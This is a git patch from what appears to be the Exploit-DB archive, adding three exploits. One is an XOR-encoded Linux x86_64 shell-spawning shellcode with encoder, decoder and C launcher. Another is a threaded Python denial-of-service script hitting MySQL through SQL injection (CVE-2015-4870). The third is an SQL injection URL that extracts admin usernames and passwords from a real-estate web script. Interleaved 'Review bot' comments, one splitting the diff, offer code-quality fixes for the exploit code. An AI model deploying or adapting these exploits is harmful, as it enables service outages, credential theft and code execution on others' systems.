From 22d168d0bc701ff106baf98dbd8a71efd2ba34a4 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 31 May 2016 05:03:26 +0000
Subject: [PATCH] DB: 2016-05-31
3 new exploits
MySQL 5.5.45 - procedure analyse Function Denial of Service
Open Source Real Estate Script 3.6.0 - SQL Injection
Linux x86_64 XOR Encode execve Shellcode
---
 files.csv | 3 +
 platforms/lin_x86-64/shellcode/39869.c | 241 +++++++++++++++++++++++++
 platforms/multiple/dos/39867.py | 98 ++++++++++
 platforms/php/webapps/39868.txt | 17 ++
 4 files changed, 359 insertions(+)
 create mode 100755 platforms/lin_x86-64/shellcode/39869.c
 create mode 100755 platforms/multiple/dos/39867.py
 create mode 100755 platforms/php/webapps/39868.txt
diff --git a/files.csv b/files.csv
index 7a3d477f5..84c6eeed4 100755
--- a/files.csv
+++ b/files.csv
@@ -36048,3 +36048,6 @@ id,file,description,date,author,platform,type,port
 39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
 39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0
 39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80
+39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0
+39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80
+39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
diff --git a/platforms/lin_x86-64/shellcode/39869.c b/platforms/lin_x86-64/shellcode/39869.c
new file mode 100755
index 000000000..60460eaf0
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39869.c
@@ -0,0 +1,241 @@
+/*
+ # Title : Linux x86_64 XOR encode execve("/bin//sh",{"//bin/sh","-i",NULL},NULL) shellcode
+ # Date : 31-05-2016
+ # Author : Roziul Hasan Khan Shifat
+ # Tested On : Ubuntu 14.04 LTS x86_64
+*/
+
+
+/*
+ main code
+ ------------------------
+
+section .text
+ global _start
+_start:
+
+xor rax,rax
+xor rdx,rdx
+
+push rax
+push rax
+
+mov [rsp],dword '//bi'
+mov [rsp+4],dword 'n/sh'
+
+
+mov rdi,rsp
+
+
+push rax
+push rax
+
+mov [rsp],word '-i'
+mov rsi,rsp
+
+push rdx
+push rsi
+push rdi
+
+mov rsi,rsp
+
+add rax,59
+syscall
+
+
+ Disassembly
+ ------------------
+Disassembly of section .text:
+
+0000000000400080 <_start>:
+ 400080: 48 31 c0 xor %rax,%rax
+ 400083: 48 31 d2 xor %rdx,%rdx
+ 400086: 50 push %rax
+ 400087: 50 push %rax
+ 400088: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp)
+ 40008f: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp)
+ 400096: 68
+ 400097: 48 89 e7 mov %rsp,%rdi
+ 40009a: 50 push %rax
+ 40009b: 50 push %rax
+ 40009c: 66 c7 04 24 2d 69 movw $0x692d,(%rsp)
+ 4000a2: 48 89 e6 mov %rsp,%rsi
+ 4000a5: 52 push %rdx
+ 4000a6: 56 push %rsi
+ 4000a7: 57 push %rdi
+ 4000a8: 48 89 e6 mov %rsp,%rsi
+ 4000ab: 48 83 c0 3b add $0x3b,%rax
+ 4000af: 0f 05 syscall
+
+*/
+
+
+/*
+
+ encoder
+ --------------
+I used a python script and a C program to encode shellcode
+
+
+ python script
+ ---------------------
+a="\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\x66\xc7\x04\x24\x2d\x69\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
+print "shellcode length %d"%len(a)
+a=a[::-1]
+
+for i in range(len(a)-1):
+ print a[i].encode('hex')
+
+
+ C program
+ -----------------
+
+#include
+#include
+main(int i,char *a[])
+{
+if(i!=2)
+{
+printf("Usage %s \n",a[0]);
+return 0;
+}
+
+
+
+FILE *f,*o;
+f=fopen(a[1],"r");
+int shell;
+
+o=fopen("shellencode.txt","w");
+if(!f || !o )
+{
+perror("FILE I/O error: ");
+return 0;
+}
+
+while( (fscanf(f,"%x",&shell)) !=EOF )
+{
+printf("%.2x\n",shell);
+fprintf(o,"%#.2x,",shell^0x90); //0x90 is seed key
+fflush(o);
+}
+
+
+fclose(o);
+fclose(f);
+return 0;
+}
+
+---------------------------------------------------------------------------------------------------------------------------------
+I am sorry that My python script is very Poor .Search internet for better XOR encoder python script
+MY Python script Reverse the shellcode
+Then COPY & Paste the rerversed shellcode into a file
+then i use the C program to encode reversed shellcode and write down shellencode.txt
+-----------------------------------------------------------------------------------------------------------------------------
+
+*/
+
+
+/*
+ decoder
+ ---------------
+section .text
+ global _start
+_start:
+
+jmp shellcode
+
+
+decoder:
+pop rsi
+xor rcx,rcx
+mov cl,49
+
+cdq
+
+mov dl,0x90 ;seed key
+
+decode:
+xor rax,rax
+mov al,[rsi]
+xor al,dl
+dec rsp
+mov [rsp],byte al
+inc rsi
+loop decode
+
+call rsp
+
+
+shellcode:
+call decoder
+ db 0x95,0x9f,0xab,0x50,0x13,0xd8,0x76,0x19,0xd8,0xc7,0xc6,0xc2,0x76,0x19,0xd8,0xf9,0xbd,0xb4,0x94,0x57,0xf6,0xc0,0xc0,0x77,0x19,0xd8,0xf8,0xe3,0xbf,0xfe,0x94,0xb4,0xd4,0x57,0xf9,0xf2,0xbf,0xbf,0xb4,0x94,0x57,0xc0,0xc0,0x42,0xa1,0xd8,0x50,0xa1
+
+
+ Disassembly
+ -------------------
+
+Disassembly of section .text:
+
+0000000000400080 <_start>:
+ 400080: eb 1d jmp 40009f
+
+0000000000400082 :
+ 400082: 5e pop %rsi
+ 400083: 48 31 c9 xor %rcx,%rcx
+ 400086: b1 31 mov $0x31,%cl
+ 400088: 99 cltd
+ 400089: b2 90 mov $0x90,%dl
+
+000000000040008b :
+ 40008b: 48 31 c0 xor %rax,%rax
+ 40008e: 8a 06 mov (%rsi),%al
+ 400090: 30 d0 xor %dl,%al
+ 400092: 48 ff cc dec %rsp
+ 400095: 88 04 24 mov %al,(%rsp)
+ 400098: 48 ff c6 inc %rsi
+ 40009b: e2 ee loop 40008b
+ 40009d: ff d4 callq *%rsp
+
+000000000040009f :
+ 40009f: e8 de ff ff ff callq 400082
+ 4000a4: 95 xchg %eax,%ebp
+ 4000a5: 9f lahf
+ 4000a6: ab stos %eax,%es:(%rdi)
+ 4000a7: 50 push %rax
+ 4000a8: 13 d8 adc %eax,%ebx
+ 4000aa: 76 19 jbe 4000c5
+ 4000ac: d8 c7 fadd %st(7),%st
+ 4000ae: c6 c2 76 mov $0x76,%dl
+ 4000b1: 19 d8 sbb %ebx,%eax
+ 4000b3: f9 stc
+ 4000b4: bd b4 94 57 f6 mov $0xf65794b4,%ebp
+ 4000b9: c0 c0 77 rol $0x77,%al
+ 4000bc: 19 d8 sbb %ebx,%eax
+ 4000be: f8 clc
+ 4000bf: e3 bf jrcxz 400080 <_start>
+ 4000c1: fe (bad)
+ 4000c2: 94 xchg %eax,%esp
+ 4000c3: b4 d4 mov $0xd4,%ah
+ 4000c5: 57 push %rdi
+ 4000c6: f9 stc
+ 4000c7: f2 bf bf b4 94 57 repnz mov $0x5794b4bf,%edi
+ 4000cd: c0 c0 42 rol $0x42,%al
+ 4000d0: a1 .byte 0xa1
+ 4000d1: d8 50 a1 fcoms -0x5f(%rax)
+
+*/
+
+/*
+The shellcode decoder.asm is the encoded shellcode
+*/
+
+
+char shellcode[]="\xeb\x1d\x5e\x48\x31\xc9\xb1\x31\x99\xb2\x90\x48\x31\xc0\x8a\x06\x30\xd0\x48\xff\xcc\x88\x04\x24\x48\xff\xc6\xe2\xee\xff\xd4\xe8\xde\xff\xff\xff\x95\x9f\xab\x50\x13\xd8\x76\x19\xd8\xc7\xc6\xc2\x76\x19\xd8\xf9\xbd\xb4\x94\x57\xf6\xc0\xc0\x77\x19\xd8\xf8\xe3\xbf\xfe\x94\xb4\xd4\x57\xf9\xf2\xbf\xbf\xb4\x94\x57\xc0\xc0\x42\xa1\xd8\x50\xa1";
+
+
+int main(int i,char *a[])
+{
+(* (int(*)()) shellcode)();
+
+}
diff --git a/platforms/multiple/dos/39867.py b/platforms/multiple/dos/39867.py
new file mode 100755
index 000000000..802ab0df0
--- /dev/null
+++ b/platforms/multiple/dos/39867.py
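Review bot: The encoder helper's input loop `while( (fscanf(f,"%x",&shell)) !=EOF )` (inside the second comment block of 39869.c) only terminates on end-of-file, so a token that is not a hex number makes fscanf return 0 without consuming it and the loop spins forever re-writing the stale (initially uninitialised) value of `shell`; testing for a successful conversion, `while (fscanf(f, "%x", &shell) == 1)`, ends the loop on either EOF or a parse failure. The same helper declares `main(int i,char *a[])` with an implicit int return type, which C99 and later reject, and its two `#include` lines name no header in the text as committed — presumably `<stdio.h>` was lost in rendering, and `FILE`, `fopen`, `fscanf` and `perror` all depend on it. The compiled part of the file is only the `char shellcode[]` array and the trailing `int main`, so these points concern the documented helper rather than the harness.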
@@ -0,0 +1,98 @@
+#!/usr/bin/env python
+
+# Title: MySQL Procedure Analyse DoS Exploit
+# Author: Osanda Malith Jayathissa (@OsandaMalith)
+# E-Mail: osanda[cat]unseen.is
+# Version: Vulnerable upto MySQL 5.5.45
+# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/
+# This exploit is compatible with both Python 3.x and 2.x
+# CVE: CVE-2015-4870
+
+from __future__ import print_function
+import threading
+import time
+import sys
+import os
+
+try:
+ import urllib.request as urllib2
+ import urllib.parse as urllib
+
+except ImportError:
+ import urllib2
+ import urllib
+
+try: input = raw_input
+except NameError: pass
+
+host = "http://host/xxx.php?id=1'"
+
+payload = " procedure analyse((select*from(select 1)x),1)-- -"
+
+payload = urllib.quote(payload)
+url = host + payload
+req = urllib2.Request(url)
+req.add_header('Accept', '*/*')
+req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')
+#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')
+req.add_header('Connection', '')
+req.add_header('Content-type', 'text/xml')
+cls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')
+
+class DoS(threading.Thread):
+ def run(self):
+ print("{0} started!".format(self.getName()))
+ for i in range(100):
+ urllib2.urlopen(req)
+
+ time.sleep(.2)
+ print("{0} finished!".format(self.getName()))
+
+def banner():
+ print ('''
+ ____ _____ __
+ /'\\_/`\\ /\\ _`\\ /\\ __`\\/\\ \\
+/\\ \\ __ __\\ \\,\\L\\_\\ \\ \\/\\ \\ \\ \\
+\\ \\ \\__\\ \\/\\ \\/\\ \\\\/_\\__ \\\\ \\ \\ \\ \\ \\ __
+ \\ \\ \\_/\\ \\ \\ \\_\\ \\ /\\ \\L\\ \\ \\ \\\\'\\\\ \\ \\L\\ \\
+ \\ \\_\\\\ \\_\\/`____ \\\\ `\\____\\ \\___\\_\\ \\____/
+ \\/_/ \\/_/`/___/> \\\\/_____/\\/__//_/\\/___/
+ /\\___/
+ \\/__/
+ ____ ____
+ /\\ _`\\ /\\ _`\\
+ \\ \\ \\/\\ \\ ___\\ \\,\\L\\_\\
+ \\ \\ \\ \\ \\ / __`\\/_\\__ \\
+ \\ \\ \\_\\ \\/\\ \\L\\ \\/\\ \\L\\ \\
+ \\ \\____/\\ \\____/\\ `\\____\\
+ \\/___/ \\/___/ \\/_____/
+
+[*] Author: Osanda Malith Jayathissa (@OsandaMalith)
+[*] E-Mail: osanda[cat]unseen.is
+[*] Website: http://osandamalith.wordpress.com
+[!] Author takes no responsibility of any damage you cause
+[!] Strictly for Educational purposes only
+''')
+ print("[*] Host: {0}".format(host))
+ input("\n\t[-] Press Return to launch the attack\n")
+
+def _start():
+ try:
+ cls()
+ banner()
+ for i in range(10000):
+ thread = DoS(name = "[+] Thread-{0}".format(i + 1))
+ thread.start()
+ time.sleep(.1)
+
+ except KeyboardInterrupt:
+ print ('\n[!] Ctrl + C detected\n[!] Exiting')
+ sys.exit(0)
+
+ except EOFError:
+ print ('\n[!] Ctrl + D detected\n[!] Exiting')
+ sys.exit(0)
+
+if __name__ == '__main__':
+ _start()
+
diff --git a/platforms/php/webapps/39868.txt b/platforms/php/webapps/39868.txt
new file mode 100755
index 000000000..c17794686
--- /dev/null
+++ b/platforms/php/webapps/39868.txt
@@ -0,0 +1,17 @@
+# Exploit Title: real-estate classified script Sql Injection
+# Date: 2015-05-29
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage:
+http://www.phpscriptsmall.com/product/open-source-real-estate-script/
+# Version: 3.6.0
+
+
+Exploit :
+http://server/[path]/contact_view.php?contact=-99999+[SQl+Command]
+
+Test :
+http://server/contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23
+
+Admin Panel : http://server/admin/
+
+
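Review bot: `cls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')` in 39867.py binds a lambda to a name, which PEP 8 discourages (flake8 E731) because the function then reports as `<lambda>` in tracebacks and the conditional repeats the `os.system` call on both branches; `def cls(): return os.system('cls' if os.name == 'nt' else 'clear')` reads more directly and selects only the command string. In `DoS.run`, `self.getName()` is the legacy camelCase accessor; `threading.Thread` exposes the same value as the `self.name` attribute, and `getName()` has been deprecated since Python 3.10. Both points are purely stylistic and leave behaviour unchanged.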